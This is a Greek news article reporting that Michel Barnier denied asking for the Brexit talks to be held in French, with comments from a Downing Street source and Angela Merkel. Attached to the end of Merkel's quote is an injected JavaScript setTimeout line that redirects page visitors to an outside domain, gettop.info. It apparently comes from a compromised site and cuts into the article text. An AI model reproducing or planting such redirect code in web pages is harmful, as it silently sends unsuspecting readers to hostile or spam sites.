Ο Μπαρνιέ διαψεύδει ότι ζήτησε να γίνουν στα γαλλικά οι διαπραγματεύσεις για το Brexit

0
11

 

Ο Μισέλ Μπαρνιέ, ο επικεφαλής διαπραγματευτής της Ευρωπαϊκής Επιτροπής για το Brexit, ξεκαθάρισε με ανάρτησή του στον προσωπικό του λογαριασμό στο Twitter, ότι δεν υπάρχει ζήτημα σχετικά με τη γλώσσα στην οποία θα διεξαχθούν οι διαπραγματεύσεις για το Brexit, διαψεύδοντας πληροφορίες που τον ήθελαν να επιμένει οι εργασίες να γίνουν στα γαλλικά.

Ο πρώην επικεφαλής της γαλλικής διπλωματίας σημείωσε χαρακτηριστικά (στα αγγλικά…) ότι «ποτέ δεν εξέφρασα άποψη για τη γλώσσα της διαπραγμάτευσης. Εργάζομαι στα αγγλικά το ίδιο συχνά με τα γαλλικά. Η γλώσσα θα αποφασιστεί μεταξύ των διαπραγματευτών πριν ξεκινήσουν οι συνομιλίες».

Πηγή προσκείμενη στην Ντάουνινγκ Στριτ είπε στο Γαλλικό Πρακτορείο ότι η βρετανική κυβέρνηση δεν γνωρίζει να έχει υποβληθεί κάποιο αίτημα από τον Μπαρνιέ σχετικά με τη γλώσσα στην οποία θα γίνει η διαπραγμάτευση.

Όταν ρωτήθηκε για το θέμα αυτό μετά τη λήξη της συνόδου κορυφής στις Βρυξέλλες, η καγκελάριος της Γερμανίας Άνγκελα Μέρκελ είπε ότι δεν είναι καθόλου ασυνήθιστο ένας Ευρωπαίος ηγέτης να θέλει να εκφράζεται στη μητρική του γλώσσα. «Όλοι εδώ επιτρέπεται να μιλούν τη γλώσσα τους. Και εφόσον ο κ. Μπαρνιέ είναι Γάλλος, δεν είναι αφύσικο να μιλάει γαλλικά, όπως εγώ μιλάω γερμανικά», σημείωσε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here